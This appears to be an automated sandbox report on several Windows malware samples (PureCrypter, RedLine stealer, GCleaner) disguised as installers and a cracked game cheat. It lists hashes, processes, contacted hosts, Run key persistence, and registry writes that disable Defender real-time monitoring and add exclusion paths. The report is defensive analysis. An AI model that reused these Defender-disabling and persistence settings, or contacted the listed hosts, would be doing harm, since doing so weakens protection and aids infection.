SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

Analysis: behavioral3

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:16

Platform

win7-20220812-en

Max time kernel

145s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe"

Signatures

PureCrypter

loader downloader purecrypter

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe

"C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 falcaoliderfm.com.br udp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp

Files

memory/1120-54-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

MD5 d57db4d9896f6a1b0f72e4503ba94ed0
SHA1 e4dc13b4c7ee490bd268e2241f8812cb3e3d5744
SHA256 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d
SHA512 ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

MD5 d57db4d9896f6a1b0f72e4503ba94ed0
SHA1 e4dc13b4c7ee490bd268e2241f8812cb3e3d5744
SHA256 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d
SHA512 ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52

memory/1120-57-0x0000000000EE0000-0x0000000000EE8000-memory.dmp

memory/1120-58-0x0000000075DF1000-0x0000000075DF3000-memory.dmp

memory/1120-59-0x0000000004855000-0x0000000004866000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:17

Platform

win10v2004-20221111-en

Max time kernel

159s

Max time network

214s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe"

Signatures

RedLine

infostealer redline

Uses the VBS compiler for execution

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3596 set thread context of 3048 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe

"C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 3596 -ip 3596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 308

Network

Country Destination Domain Proto
N/A 72.21.91.29:80 tcp
N/A 93.184.221.240:80 tcp
N/A 93.184.221.240:80 tcp
N/A 51.11.192.48:443 tcp
N/A 93.184.221.240:80 tcp
N/A 93.184.221.240:80 tcp
N/A 104.80.225.205:443 tcp
N/A 8.8.8.8:53 176.122.125.40.in-addr.arpa udp
N/A 82.115.223.46:57672 tcp
N/A 82.115.223.46:57672 tcp

Files

memory/3048-132-0x0000000000000000-mapping.dmp

memory/3596-133-0x0000000000790000-0x0000000000817000-memory.dmp

memory/3048-134-0x0000000000400000-0x0000000000430000-memory.dmp

memory/4312-139-0x0000000000000000-mapping.dmp

memory/3048-140-0x0000000005B00000-0x0000000006118000-memory.dmp

memory/3048-141-0x0000000005670000-0x000000000577A000-memory.dmp

memory/3048-142-0x00000000055A0000-0x00000000055B2000-memory.dmp

memory/3048-143-0x0000000005600000-0x000000000563C000-memory.dmp

memory/3048-144-0x0000000001420000-0x0000000001486000-memory.dmp

memory/3048-145-0x0000000006600000-0x0000000006692000-memory.dmp

memory/3048-146-0x0000000006C50000-0x00000000071F4000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:16

Platform

win7-20221111-en

Max time kernel

158s

Max time network

164s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"

Signatures

GCleaner

loader gcleaner

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\FZMYpcBymcbXiuVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WyuevociGfNU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XxxUzwYQU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HsdHtTcNAoJBjrVs = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HsdHtTcNAoJBjrVs = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OdCkbftzuRPDCLooswR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NxGlAgQUfzUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WyuevociGfNU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XxxUzwYQU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\unWhUoTpcLxwC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HsdHtTcNAoJBjrVs = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NxGlAgQUfzUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\unWhUoTpcLxwC = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\FZMYpcBymcbXiuVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HsdHtTcNAoJBjrVs = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OdCkbftzuRPDCLooswR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
N/A N/A C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\InfoInstall = "C:\\Users\\Admin\\AppData\\Roaming\\InfoInstall\\InfoInstall.exe" C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\is-A7MMA.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Reg Organizer\Languages\is-SVNUU.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\ScanRename\is-DV6H2.tmp C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-K3SKE.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-LKVCE.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-P4TTQ.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-4486U.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\cjNumber C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe N/A
File created C:\Program Files (x86)\Reg Organizer\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-GL0IN.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-6DSK2.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\Documentation\English\is-20DUD.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\ScanRename\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-UGFNF.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-JIS9A.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-QFE3J.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File opened for modification C:\Program Files (x86)\Reg Organizer\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\ScanRename\is-860AH.tmp C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-1DM7Q.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-45AFE.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File opened for modification C:\Program Files (x86)\Any Drive Formatter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-HQ93Q.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File opened for modification C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-3ASBN.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-52SMQ.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-3DEJA.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe N/A
File opened for modification C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-FBLHA.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-UPG7J.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-NG4MM.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-HEEQK.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-194OU.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\ScanRename\is-AA2TF.tmp C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
